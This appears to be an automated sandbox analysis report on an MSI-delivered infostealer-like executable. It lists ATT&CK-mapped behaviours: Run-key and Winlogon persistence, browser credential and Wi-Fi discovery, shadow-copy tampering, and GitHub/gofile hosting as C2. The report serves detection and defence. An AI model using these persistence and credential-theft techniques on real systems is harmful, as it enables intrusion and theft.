e2d230e34b9ee9bd696956826ed35333ecd1ec0a9b3fd8451cb20202e26ed5f7

pid	Process
4512	msedge.exe
3736	chrome.exe
1448	chrome.exe
5292	chrome.exe
772	chrome.exe
2596	chrome.exe
3520	msedge.exe
5796	msedge.exe

Clipboard Data 1 TTPs 64 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3912	cmd.exe
1676	cmd.exe
912	cmd.exe
4660	cmd.exe
524	powershell.exe
1092	cmd.exe
5052	cmd.exe
4652	powershell.exe
328	powershell.exe
4436	powershell.exe
5628	cmd.exe
3168	powershell.exe
5972	powershell.exe
2284	powershell.exe
5772	cmd.exe
3620	cmd.exe
1948	powershell.exe
1176	cmd.exe
4592	powershell.exe
1400	cmd.exe
1524	cmd.exe
4412	cmd.exe
3560	powershell.exe
1736	powershell.exe
4784	cmd.exe
3708	powershell.exe
3792	powershell.exe
4548	cmd.exe
6100	powershell.exe
3460	powershell.exe
3620	cmd.exe
5236	cmd.exe
4784	powershell.exe
3268	powershell.exe
4124	powershell.exe
1092	cmd.exe
3776	powershell.exe
1168	cmd.exe
5440	cmd.exe
4636	powershell.exe
3720	powershell.exe
3720	powershell.exe
1292	cmd.exe
5036	cmd.exe
5620	cmd.exe
632	powershell.exe
3124	cmd.exe
5832	powershell.exe
4112	powershell.exe
3728	cmd.exe
1348	powershell.exe
4360	cmd.exe
4716	powershell.exe
896	cmd.exe
3728	cmd.exe
3724	cmd.exe
1016	cmd.exe
456	cmd.exe
5884	cmd.exe
3728	cmd.exe
3488	powershell.exe
3720	powershell.exe
5628	powershell.exe
5268	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\efdzdfzedzed.exe	efdzdfzedzed.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows_Health_Courtage_5lZCgv = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\efdzdfzedzed.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows_Health_Courtage_5lZCgv = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\efdzdfzedzed.exe"	reg.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\D:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 37 IoCs

Web Service

T1102

flow	ioc
32	raw.githubusercontent.com
44	raw.githubusercontent.com
51	raw.githubusercontent.com
39	raw.githubusercontent.com
40	raw.githubusercontent.com
43	raw.githubusercontent.com
53	raw.githubusercontent.com
327	raw.githubusercontent.com
35	raw.githubusercontent.com
55	raw.githubusercontent.com
56	raw.githubusercontent.com
79	raw.githubusercontent.com
180	api.gofile.io
328	raw.githubusercontent.com
33	raw.githubusercontent.com
41	raw.githubusercontent.com
50	raw.githubusercontent.com
70	raw.githubusercontent.com
75	raw.githubusercontent.com
78	raw.githubusercontent.com
181	api.gofile.io
319	raw.githubusercontent.com
52	raw.githubusercontent.com
54	raw.githubusercontent.com
60	raw.githubusercontent.com
76	raw.githubusercontent.com
77	raw.githubusercontent.com
322	raw.githubusercontent.com
73	raw.githubusercontent.com
248	raw.githubusercontent.com
266	api.gofile.io
320	raw.githubusercontent.com
324	raw.githubusercontent.com
325	raw.githubusercontent.com
326	raw.githubusercontent.com
37	raw.githubusercontent.com
71	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ipinfo.io
49	ipinfo.io

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

persistence privilege_escalation

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation	efdzdfzedzed.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
5340	tasklist.exe

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Program Files\\Windows NT\\TableTextService\\efdzdfzedzed.exe"	reg.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Windows NT\TableTextService\efdzdfzedzed.exe	efdzdfzedzed.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e578462.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI87AE.tmp	msiexec.exe
File created	C:\Windows\Installer\e578464.msi	msiexec.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Installer\e578462.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{7B3CC37E-0C10-4698-8297-73D8073E1AB8}	msiexec.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe

Executes dropped EXE 11 IoCs

pid	Process
5464	efdzdfzedzed.exe
2024	efdzdfzedzed.exe
5812	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
2700	efdzdfzedzed.exe
1088	efdzdfzedzed.exe
4616	efdzdfzedzed.exe
4496	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
2540	efdzdfzedzed.exe
1680	efdzdfzedzed.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4084	sc.exe

Loads dropped DLL 36 IoCs

pid	Process
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
2024	efdzdfzedzed.exe
5812	efdzdfzedzed.exe
2024	efdzdfzedzed.exe
2024	efdzdfzedzed.exe
2024	efdzdfzedzed.exe
2024	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
3980	efdzdfzedzed.exe
2700	efdzdfzedzed.exe
1088	efdzdfzedzed.exe
2700	efdzdfzedzed.exe
2700	efdzdfzedzed.exe
2700	efdzdfzedzed.exe
2700	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
6104	efdzdfzedzed.exe
2540	efdzdfzedzed.exe
1680	efdzdfzedzed.exe
2540	efdzdfzedzed.exe
2540	efdzdfzedzed.exe
2540	efdzdfzedzed.exe
2540	efdzdfzedzed.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
5696	msiexec.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5956	reg.exe
2484	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5276	cmd.exe
3484	netsh.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b7cf3f444b48aaeb0000000000000000000000000000000000000000000000000000000000000000000000000000000000001071020000000000c01200000000ffffffff000000002701010000883801b7cf3f440000000000001071020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d083020000000000c050e1000000ffffffff000000000700010000e84101b7cf3f44000000000000d08302000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090d4e30000000000000005000000ffffffff00000000070001000048ea71b7cf3f4400000000000090d4e300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b7cf3f4400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
6000	vssadmin.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
3076	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5396	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5752	msiexec.exe
5752	msiexec.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
4436	WMIC.exe
4436	WMIC.exe
4436	WMIC.exe
4436	WMIC.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe
5464	efdzdfzedzed.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3736	chrome.exe
3736	chrome.exe
3736	chrome.exe
3736	chrome.exe
3520	msedge.exe
3520	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5696	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5696	msiexec.exe
Token: SeSecurityPrivilege	5752	msiexec.exe
Token: SeCreateTokenPrivilege	5696	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5696	msiexec.exe
Token: SeLockMemoryPrivilege	5696	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5696	msiexec.exe
Token: SeMachineAccountPrivilege	5696	msiexec.exe
Token: SeTcbPrivilege	5696	msiexec.exe
Token: SeSecurityPrivilege	5696	msiexec.exe
Token: SeTakeOwnershipPrivilege	5696	msiexec.exe
Token: SeLoadDriverPrivilege	5696	msiexec.exe
Token: SeSystemProfilePrivilege	5696	msiexec.exe
Token: SeSystemtimePrivilege	5696	msiexec.exe
Token: SeProfSingleProcessPrivilege	5696	msiexec.exe
Token: SeIncBasePriorityPrivilege	5696	msiexec.exe
Token: SeCreatePagefilePrivilege	5696	msiexec.exe
Token: SeCreatePermanentPrivilege	5696	msiexec.exe
Token: SeBackupPrivilege	5696	msiexec.exe
Token: SeRestorePrivilege	5696	msiexec.exe
Token: SeShutdownPrivilege	5696	msiexec.exe
Token: SeDebugPrivilege	5696	msiexec.exe
Token: SeAuditPrivilege	5696	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5696	msiexec.exe
Token: SeChangeNotifyPrivilege	5696	msiexec.exe
Token: SeRemoteShutdownPrivilege	5696	msiexec.exe
Token: SeUndockPrivilege	5696	msiexec.exe
Token: SeSyncAgentPrivilege	5696	msiexec.exe
Token: SeEnableDelegationPrivilege	5696	msiexec.exe
Token: SeManageVolumePrivilege	5696	msiexec.exe
Token: SeImpersonatePrivilege	5696	msiexec.exe
Token: SeCreateGlobalPrivilege	5696	msiexec.exe
Token: SeBackupPrivilege	4344	vssvc.exe
Token: SeRestorePrivilege	4344	vssvc.exe
Token: SeAuditPrivilege	4344	vssvc.exe
Token: SeBackupPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeBackupPrivilege	1780	srtasks.exe
Token: SeRestorePrivilege	1780	srtasks.exe
Token: SeSecurityPrivilege	1780	srtasks.exe
Token: SeTakeOwnershipPrivilege	1780	srtasks.exe
Token: SeBackupPrivilege	1780	srtasks.exe
Token: SeRestorePrivilege	1780	srtasks.exe
Token: SeSecurityPrivilege	1780	srtasks.exe
Token: SeTakeOwnershipPrivilege	1780	srtasks.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe
Token: SeTakeOwnershipPrivilege	5752	msiexec.exe
Token: SeRestorePrivilege	5752	msiexec.exe

Suspicious use of FindShellTrayWindow 24 IoCs

pid	Process
5696	msiexec.exe
5696	msiexec.exe
3736	chrome.exe
3520	msedge.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe
4052	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5752 wrote to memory of 1780	5752	msiexec.exe	94
PID 5752 wrote to memory of 1780	5752	msiexec.exe	94
PID 5752 wrote to memory of 5464	5752	msiexec.exe	97
PID 5752 wrote to memory of 5464	5752	msiexec.exe	97
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 2024	5464	efdzdfzedzed.exe	99
PID 5464 wrote to memory of 5812	5464	efdzdfzedzed.exe	100
PID 5464 wrote to memory of 5812	5464	efdzdfzedzed.exe	100
PID 5464 wrote to memory of 1548	5464	efdzdfzedzed.exe	101
PID 5464 wrote to memory of 1548	5464	efdzdfzedzed.exe	101
PID 1548 wrote to memory of 4436	1548	cmd.exe	103
PID 1548 wrote to memory of 4436	1548	cmd.exe	103
PID 5464 wrote to memory of 5732	5464	efdzdfzedzed.exe	104
PID 5464 wrote to memory of 5732	5464	efdzdfzedzed.exe	104
PID 5732 wrote to memory of 5396	5732	cmd.exe	290
PID 5732 wrote to memory of 5396	5732	cmd.exe	290
PID 5396 wrote to memory of 2036	5396	net.exe	227
PID 5396 wrote to memory of 2036	5396	net.exe	227
PID 5464 wrote to memory of 4972	5464	efdzdfzedzed.exe	108
PID 5464 wrote to memory of 4972	5464	efdzdfzedzed.exe	108
PID 5464 wrote to memory of 4360	5464	efdzdfzedzed.exe	165
PID 5464 wrote to memory of 4360	5464	efdzdfzedzed.exe	165
PID 4972 wrote to memory of 3488	4972	cmd.exe	112
PID 4972 wrote to memory of 3488	4972	cmd.exe	112
PID 4360 wrote to memory of 4004	4360	cmd.exe	113
PID 4360 wrote to memory of 4004	4360	cmd.exe	113
PID 5464 wrote to memory of 2232	5464	efdzdfzedzed.exe	114
PID 5464 wrote to memory of 2232	5464	efdzdfzedzed.exe	114
PID 2232 wrote to memory of 1664	2232	cmd.exe	116
PID 2232 wrote to memory of 1664	2232	cmd.exe	116
PID 5464 wrote to memory of 4156	5464	efdzdfzedzed.exe	118
PID 5464 wrote to memory of 4156	5464	efdzdfzedzed.exe	118
PID 4156 wrote to memory of 60	4156	cmd.exe	120
PID 4156 wrote to memory of 60	4156	cmd.exe	120
PID 5464 wrote to memory of 952	5464	efdzdfzedzed.exe	121
PID 5464 wrote to memory of 952	5464	efdzdfzedzed.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\efdzdfzedzed.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5696

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5752
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
  "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"
  2⤵
  - Drops startup file
  - Checks computer location settings
  - Drops file in Program Files directory
  - Executes dropped EXE
  - Loads dropped DLL
